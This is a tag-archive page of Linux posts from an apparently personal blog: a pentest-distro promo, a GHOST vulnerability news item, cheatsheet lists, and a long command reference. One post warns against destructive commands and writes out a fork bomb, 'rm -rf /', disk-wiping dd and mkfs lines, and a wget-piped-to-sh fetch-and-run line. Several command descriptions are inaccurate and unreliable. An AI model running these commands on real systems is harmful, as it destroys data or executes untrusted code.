Posts Tagged ‘linux’

Cyborg Linux, based on ubuntu, was developed by Team Cyborg, led by Vaibhav Singh and Shahnawaz Alam from Ztrela Knowledge Solutions. Cyborg Hawk has more than 700 tools, the most complete tool, can be used for network security and auditing and digital forensics, but also for mobile security and wireless network security testing. Cyborg Hawk’s interface is also quite beautiful, and is considered to be the most advanced, powerful and beautiful penetration test release ever.


  • More than 750+ penetration testing tools included.
  • Cyborg Hawk is totally Free and always will be.
  • Can be used as live OS with full capability.
  • Exploitation Toolkit, Stress Testing, Reverse Engineering, Forensics, Mobile Security & Wireless Security.
  • Full virtual machine support in version v1.1.
  • Now comes with its own repository.
  • Reliable and stable.
  • Various Wireless devices support.
  • Well sorted menu, everything organised in a logical manner.
  • The kernel is patched from injection.

Tool Categories

The 750 or so tools are grouped roughly in the menu in the following categories:

  • Information Gathering
  • Vulnerability Assessment
  • Exploitation
  • Privilege Escalation
  • Maintaining Access
  • Documentation & Reporting
  • Reverse Engineering
  • Stress Testing
  • Forensics
  • Wireless Security
  • Hardware Hacking
  • VoIP Analysis
  • Mobile Security
  • Malware Analysis

Download Cyborg 

Documentation Cyborg LINUX

Cyborg tutorials



Linux shell or terminal commands are very powerful and just a simple command could lead one to delete a folder, files or root folder, etc. Linux never asks for confirmation rather it will execute the command right away causing you to lose useful data and information stored in these files and folders.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };: also known as Fork Bomb is a denial-of-service attack against a Linux System. :(){ :|: & };: is a bash function. Once executed, it repeats itself multiple times until the system freezes.

To get ride of this you need to restart or reboot your server. So be careful when executing this command on your Linux shell.

2. Mv Folder/Dev/Null Command

mv folder/dev/null is another risky command. Dev/null or null device is a device file that discards all the data written on it but it reports that the writing operation is executed successfully. It is also known as bit bucked or black hole.

3. Rm -Rf Command

rm -rf command is a to delete a folder and its content in the Linux operating system. If you don’t know how to use it then its very dangerous to the system. The most common combinations and options used with rm-rf command are listed below:

  • rm command is used to delete the files in Linux system.
  • rm -f command removes read-only files in folder without prompting.
  • rm -r command deletes the content of a folder recursively.
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf/ command is used for forced deletion (it deletes it even if it’s write protected) of all the content in root directory and sub folders.
  • rm -rf* command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders.
  • rm -rf. command is used for forced deletion of all the content in the current folder and sub folders. The rm -r.[^.]* command can also be used.
  • rm -i command is used for removal of files and folders but a prompt will appear before removal.

4. Mkfs Command

mkfs can be a dangerous command for your Linux based system if you don’t know its purpose. Anything written after the mkfs will be formatted and replaced by a blank Linux file system.

The below given commands will format the hard drive and need administration power

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
  • mkfs.cramfs ( No need of administration power)

5. Tar Bomb

The tar command is used combine many number of files to single file (archived file) in.tarformat. A Tape Archive (Tar) bomb can be created with this command.

It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.

To avoid becoming a victim of a tar bomb by regularly creating a new protective directory whenever you receive a tar file and then moving the received tar file into this directory before untarring.If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it.

Another way to avoid the explosion of a tar bomb is via the -t option to list all of the content of a tar file to give you an idea of the type of content contained within the tar file.

6. Dd Command

The dd command is used to copy & convert hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
  • dd if=/dev/zero of=/dev/had (will zero out the whole primary hard drive)

7. Shell Script Code

Someone may victimize you by giving you the link to a shell script and endorsing you to download and execute it. The script may contain some malicious or dangerous code inside. The format of command may look like this: wget http://some_malicious_source -O- | sh. The wget will download the script while the sh downloads the script execution.

8. Malicious Source Code

Someone gives you the source code and asks you to compile it. The code may appear to be a normal code but in fact some malicious code is disguised in the large source code and it may cause harm to your system. To avoid being victimized by this kind of attack, only accept and compile your source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and you are asked to extract this file which appears to be very small in size but may be a few KB. In fact, this small sized compressed file contains very highly compressed data.

Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system.


Ghost in the Machine

Posted: 29/01/2015 in Uncategorized
Tags: , , , ,

tv crime2A newly disclosed flaw opens up most Linux-based Web and mail servers to attack, researchers from Redwood Shores, California-based security firm Qualys disclosed today (Jan. 27).

The flaw, dubbed “GHOST” by its discoverers, “allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials,” (i.e. administrative passwords), Qualys staffer Amol Sarwate said in a company blog posting.

“As a proof of concept, we developed a full-fledged remote exploit against the Exim mail server, bypassing all existing protections (ASLR, PIE, and NX) on both 32-bit and 64-bit machines,” Qualys researchers posted on the Openwall security mailing list earlier today.

MORE: 5 Worst Security Fails of 2014

GHOST is of immediate and urgent concern to any IT professional administering a Linux-based server, but users of desktop Linux should also install patches, which have already been pushed out by Red Hat and Ubuntu, among others. (Red Hat Fedora 20 and later, and Ubuntu 13.10 and later, were already immune.)

Various flavors of Linux power at least a third of the world’s Web servers and mail servers, but it’s likely that administrators at top Web-based companies were tipped off ahead of today’s disclosure.

GHOST, designated CVE-2015-0235 per security-industry convention, is the fourth major vulnerability in open-source software found in the past 10 months. The stampede began with the discovery of the Heartbleed flaw in OpenSSL in April, then continued with the Shellshock hole in the Bash command-line shell in September, followed by the POODLE weakness in Web encryption in October.

Such technical talk may be gobbledygook to most computer users, but arcane open-source software runs the Internet and the Web that rides on top of it. Any major open-source flaw threatens not only the massive global Internet economy, but your ability to check your own Facebook page.

“To be clear, this is NOT the end of the Internet,” wrote Jen Ellis of Boston information-security firm Rapid7 in an official blog posting. “It’s also not another Heartbleed. But it is potentially nasty, and you should patch and reboot your affected systems immediately.”

GHOST vulnerability explained

The flaw exists in older versions of the GNU C library, or glibc, a repository of open-source software written in the C and C++ coding languages. Newer versions of glibc, beginning with glibc 2.18, released in August 2013, are not affected. But many builds of Linux may still be using older versions.

In addition to Exim, server software vulnerable to GHOST includes Apache, Sendmail, Nginx, MySQL, CUPS, Samba and many others, according to a post by Qualys researchers on the Full Disclosure mailing list. CORRECTION: The applications listed on the Full Disclosure page are NOT vulnerable to GHOST.

The risk to users of massively subscribed services such as Twitter, Facebook and all of Google’s online services should be low, presuming that administrators of those company’s servers have already implemented or are currently implementing patches. (It’s possible that last night’s 40-minute Facebook outage was the result of this.)

But implementation of the patches will have to be manual, which means that millions of websites and mail servers that don’t get the same degree of administrative attention will continue to be vulnerable for an extended period of time.

Thanks to Qualys and Tom’s Guide

tv - programer

When working on an app or a code, you may often need some reference material that’s where cheatsheets become very useful.

Here we present to you with an A-Z of cheatsheets that are relevant to programmers and developers. It doesn’t cover all languages or databases, but you’ll find most of what you need. If there’s anything missing, feel free to let us know so we can do better.

1. Asynchronous JavaScript And XML (AJAX): This is a group of interrelated web development techniques that are used to create asynchronous web applications on the client side.

2. Apache: If you’re using the Apache HTTP server then this cheat sheet is just what you would need in front of you.

3. Apache Ant: This java library and command line tool is used for automating software build processes.

4. Apache Cassandra: The open source distributed database management system is often the first pick when scalability is a concern.

5. American Standard Code for Information Interchange (ASCII): The most common character encoding scheme.

6. Berkeley DB: Oracle’s Berkeley DB is a fast and reliable option chosen by many developers.

7. Blueprint: This is a cheatsheet on the popular CSS framework/

8. C: In many ways it is the father of some of the most popular programming languages.

9. C#: A cheatsheet on C# never goes to waste. Most programmers learn the language and a cheatsheet always helps.

10. C++: One of the most useful programming languages ever. It is a must learn language for programmers.

11. Calculus and Analysis: Programmers and developers often need to have a good grasp on calculus and analysis in order to build certain types of apps.

12. Clojure: One of the most popular languages running on the Java Virtual Machine.

13. CSS: Cascading Style Sheets along with HTML is the language of the internet.

14. Debian: A cheatsheet on one of the most popular Linux-based distributions.

15. Django: Written in Python, this is an open source web application framework used by many.

16. DOM – Document Object Model: This is the convention used for interacting with objects in XHTML, XML and HTML.

17. Drupal: The open source content management system is highly popular amongst developers/

18. Eclipse: One of the most popular IDEs, used almost everywhere today.

19. Fedora: One of the big daddies from amongst the Linux-based distributions.

20. Firebug: The web development add-on for Mozilla’s Firefox has turned quite a few heads.

21. Git: It doesn’t matter whether you support open source or not, Git needs no introduction.

22. Groovy: This is another programming language that runs on the Java Virtual Machine.

23. Hadoop: Big Data is the future and hence, so is Hadoop.

24. Haskell: This is an open source functional programming language.

25. HTML: Use the Hypertext Markup Language to create your own website.

26. Java: The inescapable language for programmers and developers.

27. JavaScript: The scripting language for the web.

28. jQuery: A feature rich JavaScript library.

29. Linux: Command line tips that Linux users will find useful.

30. Mac OS X: This is a keyboard cheatsheets for Apple’s Mac OS X users.

31. Mathematica: The Wolfram Mathematica is considered to be a very powerful system.

32. MATLAB: This is a high-level technical computing language and interactive environment.

33. MySQL: Some have been losing fait over MySQL, but the database still goes strong.

34. NMAP: You hackers know what this is don’t you?

35. Node.js: This is the pick of the lot for building scalable web

36. Oracle: This is a reference cheat sheet for Oracle’s SQL.

37. Perl: The popular programming language is used in a variety of places.

38. PHP: Not much needs to be said about PHP.

39. PostgreSQL: This is often used as an alternative for MySQL.

40. Python: One of the most popular programming languages available today. It is used in everything from game programming to hacking.

41. Ruby: Another popular programming platform used by many across the globe.

42. Ruby on Rails: This is an open source framework that runs on Ruby.

43. Scala: This is an object-functional programming and scripting language running on the JVM.

44. Shell script

45. SQL – Structured Query Language: The programming language used to manage data stored in relational database systems.

46. SQLite: This is the relational database management system that is held in a C programming library.

47. Ubuntu: Linux for humans. It may be so, but a cheatsheet is still useful.

48. Unicode: This is the standard for encoding in the world of computers.

49. Unix: A cheatsheet for working on the Unix command line.

50. WordPress: The content management system has grown in popularity over time.

51. XHTML: This is an XML markup language. It stands for Extensible HTML.

52. XML: XML stands for Extensible Markup Language and is used by many.

53. .NET: This framework from Microsoft runs primarily on Windows and there is a debate about whether it is open source or not.



Google Chrome, a browser built on the Blink layout engine that aims to be minimalistic and versatile at the same time, is now at version 31.0.1650.26 Beta.

After the release of a development and stable version, a new Google Chrome Beta is now available, bringing a few much needed changes and improvements.

According to the announcement, a “kiosk_only” manifest attribute has been added for platform apps, a content switch has been added to turn off unprefixed MediaSource API, a wrong policy used for secondary users has been corrected, a tablet layout regression has been corrected, and much more.

A complete list of bug fixes and changes can be found in the official changelog.

Download Google Chrome 31.0.1650.26 Beta for Windows
Download Google Chrome 31.0.1650.26 Beta for Mac OS X
Download Google Chrome 31.0.1650.26 Beta for Linux


Following on from a recent post Nmap Cheat Sheet’I have decided to create another cheat sheet but this time for GNU/Linux as I am constantly referring to it for reference. These kind of things are very handy as if you are like myself and don’t use Linux on a daily basis they can play a major part in jogging the little grey cells.

Download:  Cheat Sheet commands for GNU/Linux

CheatSheet commands for GNU / Linux

System Information

1. arch: show the architecture of the machine (1).
2. uname -m: show the architecture of the machine (2)..
3. uname -r: show the kernel version used.
4. dmidecode -q: display the components (hardware) system.
5. hdparm -i /dev/hda: show the characteristics of a hard disk.
6. hdparm -tT /dev/sda: make reading test on a hard disk.
7. cat /proc/cpuinfo: CPU information show.
8. cat /proc/interrupts: show interrupts.
9. cat /proc/meminfo: verify memory usage.
10. cat /proc/swaps: show swap files.
11. cat /proc/version: display the version of the kernel.
12. cat /proc/net/dev: network adapters and display statistics.
13. cat /proc/mounts: display the mounted file system.
14. lspci -tv: show PCI devices.
15. lsusb -tv: show USB devices.
16. date: display the system date.
17. cal 2013: show calendar 2013.
18. cal 07 2013: show the calendar for the month July 2013.
19. date 041217002013.00: place (declare, set) date and time.
20. clock -w: save changes to the BIOS date.

Shutdown (Reset System or Log out)

1. shutdown -h now: Shut down system (1).
2. init 0: Shut down system (2).
3. telinit 0: Shut down system (3).
4. halt: shutdown the system (4).
5. shutdown -h hours:minutes &: planned shutdown of the system.
6. shutdown -c: cancel a planned shutdown of the system.
7. shutdown -r now: Restart (1).
8. reboot: Reboot (2).
9. logout: close session.

Files and Directories

1. cd /home: enter the “home” directory.
2. cd ..: go back one level.
3. cd ../..: back 2 levels.
4. cd: go to the root directory.
5. cd ~user1: go to directory user1.
6. cd -: go (back) to the previous directory.
7. pwd: : show the path of the working directory.
8. ls: see the files in a directory.
9. ls -F: see the files in a directory.
10. ls -l: show details of files and folders in a directory.
11. ls -a: show hidden files.
12. ls *[0-9]*: show the files and folders that contain numbers.
13. tree: display files and folders in a tree starting from the root. (1)
14. lstree: display files and folders in a tree starting from the root. (2)
15. mkdir dir1: create a folder or directory called ‘dir1’.
16. mkdir dir1 dir2: create two folders or directories simultaneously (Create two directories at once)
17. mkdir -p /tmp/dir1/dir2: create a directory tree.
18. rm -f file1: delete the file called file1.
19. rmdir dir1: delete the folder called dir1.
20. rm -rf dir1: delete a folder called dir1 with its contents recursively.
21. rm -rf dir1 dir2: delete two folders (directories) with its contents recursively.
22. mv dir1 new_dir: rename or move a file or folder (directory).
23. cp file1: copy a file.
24. cp file1 file2: copy two files together.
25. cp dir /* . : copy all the files in a directory within the current working directory.
26. cp -a /tmp/dir1 . : copy a directory within the current working directory.
27. cp -a dir1: copy a directory.
28. cp -a dir1 dir2: copy two directories.
29. ln -s file1 lnk1: create a symbolic link to the file or directory.
30. ln file1 lnk1: creating a physical link to the file or directory.
31. touch -t 0712250000 file1: modify the real time (time of creation) of a file or directory.
32. file file1: output (screen dump)
33. iconv -l: lists of known encryption.
34. iconv -f fromEncoding -t toEncoding inputFile > outputFile: creates a new form of the input file is encoded in assuming and making a ToEncoding fromEncoding.
35. find . -maxdepth 1 -name *.jpg -print -exec convert ”{}” -resize 80×60 “thumbs/{}” \;: grouping resized files in the current directory and send them to directories in thumbnail view (requires converting from ImageMagick).

Finding Files

1. find / -name file1: file and directory search from the root of the system.
2. find / -user user1: find files and directories belonging to user user1.
3. find /home/user1 -name \*.bin: search files with extension ‘. bin ‘directory within it’ / home/user1.
4. find /usr/bin -type f -atime +100: look at binary files used in the last 100 days.
5. find /usr/bin -type f -mtime -10: find the changed files created within the last 10 days.
6. find / -name \*.rpm -exec chmod 755 ‘{}’ \;: look for files with extension. ‘rpm’ and change permissions.
7. find / -xdev -name \*.rpm: Find files with extension ‘. rpm’ ignoring them removable devices such as cdrom, pen-drive, etc ….
8. locate \*.ps: find files with extension. ‘ps’ primarily executed with the command ‘updatedb’.
9. whereis halt: show the location of a binary file. In this case you are wondering Where he command ‘halt’
10. which halt: show the full path (full path to it) to a binary / executable.

Mounting a file system

1. mount /dev/hda2 /mnt/hda2: mount a disk called hda2. Check first the existence of the directory ‘/ mnt/hda2?, If not, create it.
2. umount /dev/hda2: removing a disk called hda2. Out first from point ‘/ mnt/hda2.
3. fuser -km /mnt/hda2: force umount when the device is busy.
4. umount -n /mnt/hda2: running disassembly without reading the file / etc / mtab. Useful when the file is read-only or the hard drive is full.
5. mount /dev/fd0 /mnt/floppy: mount a floppy disk (floppy).
6. mount /dev/cdrom /mnt/cdrom: mount a cdrom / dvdrom.
7. mount /dev/hdc /mnt/cdrecorder: mount a rewritable cd or dvdrom.
8. mount /dev/hdb /mnt/cdrecorder: mount a rewritable cd / dvdrom (a dvd).
9. mount -o loop file.iso /mnt/cdrom: mount a file or iso image.
10. mount -t vfat /dev/hda5 /mnt/hda5: mount a FAT32 file system.
11. mount /dev/sda1 /mnt/usbdisk: mount a usb thumb drive or a memory (without specifying the filesystem type).

Hard Disk Space

1. df -h: display a list of mounted partitions.
2. ls -lSr |more: show the size of the files and directories sorted by size.
3. du -sh dir1: Estimate the space used by the directory dir1.
4. du -sk * | sort -rn: show the size of the files and directories sorted by size.
5. rpm -q -a –qf ‘%10{SIZE}t%{NAME}n’ | sort -k1,1n: show space used by the installed rpm packages organized by size (Fedora, Redhat and others).
6. dpkg-query -W -f=’${Installed-Size;10}t${Package}n’ | sort -k1,1n: show space used by the packages installed, organized by size (Ubuntu, Debian and others) .

Users and Groups

1. groupadd name_of_the_group: create a new group.
2. groupdel name_of_the_group: delete a group.
3. groupmod -n new_name_of_the_group old_name_of_the_group: rename a group.
4. useradd -c “Name Surname ” -g admin -d /home/user1 -s /bin/bash user1: Create a new user belonging to the “admin”.
5. useradd user1: create a new user.
6. userdel -r user1: delete a user (‘-r’ eliminates home directory).
7. usermod -c “User FTP” -g system -d /ftp/user1 -s /bin/nologin user1: change user attributes.
8. passwd: Changing password.
9. passwd user1: change the password of a user (only root).
10. chage -E 2013-12-31 user1: place a time limit for the user’s password. In this case says that the key expires on December 31, 2013.
11. pwck: correct syntax check the file format of ‘/ etc / passwd’ and the existence of users.
12. grpck: check correct syntax and format of the file ‘/ etc / group’ and the existence of groups.
13. newgrp group_name: Registers a new group to change the default group of newly created files.

File Permissions (Use “+” to place permissions and “-” to remove)

1. ls -lh: Show permissions.
2. ls /tmp | pr -T5 -W$COLUMNS: Terminal divided into 5 columns.
3. chmod ugo+rwx directory1: : enable read permissions (r) , write (w) and execute (x) to the owner (u) group (g) and others (o) on the directory ‘directory1
4. chmod go-rwx directory1: remove read permission (r), write (w) and (x) running the group (g) and others (o) on the directory ‘directory1
5. chown user1 file1: cchange owner of a file.
6. chown -R user1 directory1: change the owner of a directory and all files and directories contained within.
7. chgrp group1 file1: changing group of files.
8. chown user1:group1 file1: change user and group ownership of a file.
9. find / -perm -u+s: display all system files with SUID configured.
10. chmod u+s /bin/file1: set the SUID bit on a binary file. The user that running that file takes the same privileges as the owner.
11. chmod u-s /bin/file1: disable SUID bit on a binary file.
12. chmod g+s /home/public: place a SGID bit on a directory-similar to SUID but for directory.
13. chmod g-s /home/public: disable SGID bit on a directory.
14. chmod o+t /home/public: place a bit STIKY in a directory. Allows deletion of files only rightful owners.
15. chmod o-t /home/public: STIKY disable bit in a directory.

Special Attributes on files (Use “+” to place permissions and “-” to remove)

1. chattr +a file1: allows to writte by opening a file only append mode.
2. chattr +c file1: allows a file to be compressed / decompressed automatically.
3. chattr +d file1: ensures that the program ignore delete files during backup.
4. chattr +i file1: convert the file unchanged, so it can not be removed, altered, renamed, or bound.
5. chattr +s file1: allows a file to be deleted safely.
6. chattr +S file1: ensures that a file is modified, the changes are written in synchronous mode as with sync.
7. chattr +u file1: allows you to restore the contents of a file even if it is canceled.
8. lsattr: show special attributes.

Compressed files

1. bunzip2 file1.bz2: decompress in file called ‘file1.bz2.
2. bzip2 file1: compress a file called file1.
3. gunzip file1.gz: decompress a file called ‘file1.gz.
4. gzip file1: compress a file called ‘file1.
5. gzip -9 file1: compress with maximum compression.
6. rar a file1.rar test_file: create a zip file called ‘file1.rar’.
7. rar a file1.rar file1 file2 dir1: compress ‘file1,’ file2 and ‘dir1Simultaneously.
8. rar x file1.rar: decompress rar file.
9. unrar x file1.rar: decompress rar file.
10. tar -cvf archive.tar file1: create an uncompressed tarball.
11. tar -cvf archive.tar file1 file2 dir1: create an archive containing ‘file1,file2 and dir1.
12. tar -tf archive.tar: show contents a file.
13. tar -xvf archive.tar: extract a tarball.
14. tar -xvf archive.tar -C /tmp: extract a tarball in / tmp.
15. tar -cvfj archive.tar.bz2 dir1: create a tarball compressed into bzip2.
16. tar -xvfj archive.tar.bz2: decompress a bzip2 compressed tar file.
17. tar -cvfz archive.tar.gz dir1: create a gzip tarball.
18. tar -xvfz archive.tar.gz: decompress a gzip compressed tar archive.
19. zip file1: create a zip file.
20. zip -r file1 file2 dir1: compress in zip several files and directories simultaneously.
21. unzip decompress a zip file.

RPM Packages (Red Hat, Fedora…etc)

1. rpm -ivh package.rpm: install an rpm package.
2. rpm -ivh –nodeeps package.rpm: installing an rpm package ignoring dependencies requests.
3. rpm -U package.rpm: upgrade a rpm package without changing configuration files.
4. rpm -F package.rpm: upgrade a rpm package only if it is installed.
5. rpm -e package_name.rpm: remove a rpm package.
6. rpm -qa: show all rpm packages installed on the system.
7. rpm -qa | grep httpd: show all rpm packages with the name “httpd”.
8. rpm -qi package_name: get information on a specific package installed.
9. rpm -qg “System Environment/Daemons”: show rpm packages of a software group.
10. rpm -ql package_name: show list of files given by a rpm package installed.
11. rpm -qc package_name: show configuration files list given by a rpm package installed.
12. rpm -q package_name –whatrequires: show list of dependencies required for a rpm package.
13. rpm -q package_name –whatprovides: show the capacity provided by a rpm package.
14. rpm -q package_name –scripts: scripts show started during installation / removal.
15. rpm -q package_name –changelog: display the history of revisions of a rpm package.
16. rpm -qf /etc/httpd/conf/httpd.conf: check which rpm package belongs to a given file.
17. rpm -qp package.rpm -l: show list of files given by a rpm package not yet been installed.
18. rpm –import /media/cdrom/RPM-GPG-KEY: Import digital signature public key.
19. rpm –checksig package.rpm: verify the integrity of a package rpm.
20. rpm -qa gpg-pubkey: verify the integrity of all rpm packages installed.
21. rpm -V package_name: check the file size, licenses, rates, owner, group, check MD5 digest and last modified.
22. rpm -Va: check all rpm packages installed on the system. Use with caution.
23. rpm -Vp package.rpm: verify a rpm package not yet installed.
24. rpm2cpio package.rpm | cpio –extract –make-directories *bin*: extracting executable file from a rpm package.
25. rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm: install a package built from a source rpm.
26. rpmbuild –rebuild package_name.src.rpm: build a rpm package from a source rpm.

YUM packages updater (Red Hat, Fedora…etc)

1. yum install package_name: download and install a rpm package..
2. yum localinstall package_name.rpm: This will install an RPM and attempt to resolve all dependencies for you, using your repositories.
3. yum update package_name.rpm: update all rpm packages installed on the system.
4. yum update package_name: upgrade a rpm package.
5. yum remove package_name: remove a rpm package.
6. yum list: list all packages installed on the system.
7. yum search package_name: Find a package repository rpm.
8. yum clean packages: clean a cache erasing downloaded packages.
9. yum clean headers: remove all header files that the system uses to resolve the dependency.
10. yum clean all: delete from the cache packages and header files.

Deb packages (Debian, Ubuntu…etc)

1. dpkg -i package.deb: upgrade a deb package.
2. dpkg -r package_name: remove a deb package.
3. dpkg -l: show all deb packages installed on the system.
4. dpkg -l | grep httpd: show all deb packages with the name “httpd”
5. dpkg -s package_name: to obtain information on a specific package installed on the system.
6. dpkg -L package_name: show list of files given by a package installed on the system.
7. dpkg –contents package.deb: show list of files given by a package not yet installed.
8. dpkg -S /bin/ping: check which package owns a given file.

APT packages updater (Debian, Ubuntu …etc)

1. apt-get install package_name: install / upgrade a deb package.
2. apt-cdrom install package_name: install / upgrade a deb package from cdrom.
3. apt-get update: update the package list.
4. apt-get upgrade: update all installed packages
5. apt-get remove package_name: remove a deb package.
6. apt-get check: check the correct resolution of dependencies.
7. apt-get clean: clean up cache from packages downloaded.
8. apt-cache search searched-package: returns list of packages that corresponds to the series’ wanted packages. ”

View the contents of a file

1. cat file1: view the contents of a file starting from the first row.
2. tac file1: view the contents of a file starting from the last line.
3. more file1: view content along a file.
4. less file1: command like ‘more’ but can save the file movement and backward movement.
5. head -2 file1: see the first two lines of a file.
6. tail -2 file1: see the last two lines of a file.
7. tail -f /var/log/messages: see in real time what has been added to the file.

Text Manipulation

1. cat file1 file2 .. | command <> file1_in.txt_or_file1_out.txt: general syntax for text manipulation using PIPE, STDIN and STDOUT.
2. cat file1 | command( sed, grep, awk, grep, etc…) > result.txt: general syntax to manipulate a text from a file and write the output to a new file.
3. cat file1 | command( sed, grep, awk, grep, etc…) » result.txt: general syntax to manipulate a text from a file and add result in an existing file.
4. grep Aug /var/log/messages: search words “Aug” on file ‘/ var / log / messages’.
5. grep ^Aug /var/log/messages: look for words that begin with “Aug” on file ‘/ var / log / messages’
6. grep [0-9] /var/log/messages: select all lines in the file ‘/ var / log / messages’ that contain numbers.
7. grep Aug -R /var/log/*: search for the string “Aug” in directory ‘/ var / log’ and below.
8. sed ‘s/stringa1/stringa2/g’ example.txt: relocate “string1” with “string2” in example.txt
9. sed ‘/^$/d’ example.txt: delete all blank lines from the example.txt
10. sed ‘/ *#/d; /^$/d’ example.txt: Remove comments and blank lines example.txt
11. echo ‘esempio’ | tr ‘[:lower:]‘ ‘[:upper:]‘: convert lowercase to uppercase
12. sed -e ’1d’ result.txt: deletes the first line of the file sample.txt
13. sed -n ‘/stringa1/p’: display only lines that contain the word “string1”.

Character set and file conversion

1. dos2unix filedos.txt fileunix.txt: convert a text file format from MSDOS to UNIX.
2. unix2dos fileunix.txt filedos.txt: convert a text file format from UNIX to MSDOS.
3. recode ..HTML < page.txt > page.html: convert a text file to html.
4. recode -l | more: show all available format conversions.

Analysis of the file systems

1. badblocks -v /dev/hda1: Check for bad blocks on disk hda1.
2. fsck /dev/hda1: repair / check integrity Linux system file on disk hda1.
3. fsck.ext2 /dev/hda1: repair / check integrity ext 2 file system on disk hda1.
4. e2fsck /dev/hda1: repair / check integrity ext 2 file system on disk hda1.
5. fsck.ext3 /dev/hda1: repair / check integrity ext 3 file system on disk hda1.
6. fsck.vfat /dev/hda1: repair / check integrity ext 3 file system on disk hda1.
7. fsck.msdos /dev/hda1: repair / check integrity of a file from MSDOS system on disk hda1.
8. dosfsck /dev/hda1: repair / check integrity of a file from a DOS system on disk hda1.

Formatting a filesystem

1. mkfs /dev/hda1: create a Linux file system on the partition hda1.
2. mke2fs /dev/hda1: create a system file type on the partition hda1
3. mke2fs -j /dev/hda1: create a Linux file system type ext3 (journal) on hda1 partition.
4. mkfs -t vfat 32 -F /dev/hda1: ccreate a FAT32 file system on hda1.
5. fdformat -n /dev/fd0: flooply format a disk.
6. mkswap /dev/hda3: create a swap file system.

Working with SWAP

1. mkswap /dev/hda3: create a swap file system.
2. swapon /dev/hda3: activate a new swap partition.
3. swapon /dev/hda2 /dev/hdb3: activate two swap partitions.


1. dump -0aj -f /tmp/home0.bak /home: make a complete backup directory ‘/ home’.
2. dump -1aj -f /tmp/home0.bak /home: make incremental backup directory ‘/ home’.
3. restore -if /tmp/home0.bak: restoring a backup interactively.
4. rsync -rogpav –delete /home /tmp: synchronization between directories.
5. rsync -rogpav -e ssh –delete /home ip_address:/tmp: rsync through SSH tunnel.
6. rsync -az -e ssh –delete ip_addr:/home/public /home/local: synchronize a local directory with a remote directory via ssh and compression.
7. rsync -az -e ssh –delete /home/local ip_addr:/home/public: Synchronize a remote directory with a local directory via ssh and compression.
8. dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr ‘dd of=hda.gz’: make a backup on a hard disk on a remote host via ssh.
9. dd if=/dev/sda of=/tmp/file1: save the contents of a hard drive to a file. (In this case the hard drive is “sda” and the file “file1”).
10. tar -Puf backup.tar /home/user: make incremental backup directory ‘/ home / user’.
11. ( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr ‘cd /home/share/ && tar x -p’: copy the contents of a directory on a remote directory via ssh.
12. ( tar c /home ) | ssh -C user@ip_addr ‘cd /home/backup-home && tar x -p’: copy a local directory on a remote directory via ssh.
13. tar cf – . | (cd /tmp/backup ; tar xf – ): local copy preserving permits and links from one directory to another.
14. find /home/user1 -name ‘*.txt’ | xargs cp -av –target-directory=/home/backup/ –parents: finding and copying all files with ‘. txt’ from one directory to another.
15. find /var/log -name ‘*.log’ | tar cv –files-from=- | bzip2 > log.tar.bz2: find all files with ‘. log’ and make a bzip file.
16. dd if=/dev/hda of=/dev/fd0 bs=512 count=1: make a copy of MRB (Master Boot Record) to floppy.
17. dd if=/dev/fd0 of=/dev/hda bs=512 count=1: restore the backup of the MBR (Master Boot Record) saved on a floppy.


1. cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force: clean or erase a rewritable cd.
2. mkisofs /dev/cdrom > cd.iso: create an iso image of cdrom on disk.
3. mkisofs /dev/cdrom | gzip > cd_iso.gz: create a compressed iso image of cdrom on disk.
4. mkisofs -J -allow-leading-dots -R -V “Label CD” -iso-level 4 -o ./cd.iso data_cd: create an iso image from a directory.
5. cdrecord -v dev=/dev/cdrom cd.iso: burn an iso image.
6. gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom -: burn an iso image compression.
7. mount -o loop cd.iso /mnt/iso: mount an iso image.
8. cd-paranoia -B: take songs from a cd to wav files.
9. cd-paranoia – ”-3”: take the first 3 songs from a CD to wav files.
10. cdrecord –scanbus: scan bus to identify the channel scsi.
11. dd if=/dev/hdc | md5sum: to run an md5sum in a device such as a cd.

LAN and Wi-Fi

1. ifconfig eth0: show the configuration of an Ethernet network card.
2. ifup eth0: activate an interface ‘eth0’
3. ifdown eth0: disable an interface ‘eth0’
4. ifconfig eth0 netmask set an IP address.
5. ifconfig eth0 promisc: configure ‘eth0’ common mode for packets (sniffing).
6. dhclient eth0: active interface ‘eth0’ dhcp mode.
7. route -n: show route table
8. route add -net 0/0 gw IP_Gateway: default input configuration.
9. route add -net netmask gw Configure static route for network search ‘192 .168.0.0/16’
10. route del 0/0 gw IP_gateway: remove the static route.
11. echo “1” > /proc/sys/net/ipv4/ip_forward: enable ip route.
12. hostname: display the system hostname.
13. host hostname search to resolve the name to an IP address (1).
14. nslookup find the host name to resolve the name to an IP address and vice versa (2)
15. ip link show: show the link status of all interfaces.
16. mii-tool eth0: show the link status of ‘eth0’
17. ethtool eth0: display statistics for ‘eth0’.
18. netstat -tup: show all active network connections and their PID.
19. netstat -tupl: show all network services listening on the system and its PID.
20. tcpdump tcp port 80: show all HTTP traffic.
21. iwlist scan: show wireless networks.
22. iwconfig eth1: show the configuration of a wireless network card.
23. whois search Whois database.

Microsoft Windows Networks (SAMBA)

1. nbtscan ip_addr: net bios name resolution.
2. nmblookup -A ip_addr: net bios name resolution.
3. smbclient -L ip_addr/hostname: show remote actions of a windows host.


1. iptables -t filter -L: show all chains of the filter table.
2. iptables -t nat -L: show all chains of the nat table.
3. iptables -t filter -F: clear all rules from the filter table.
4. iptables -t nat -F: clean all nat table rules.
5. iptables -t filter -X: delete any user-created chain.
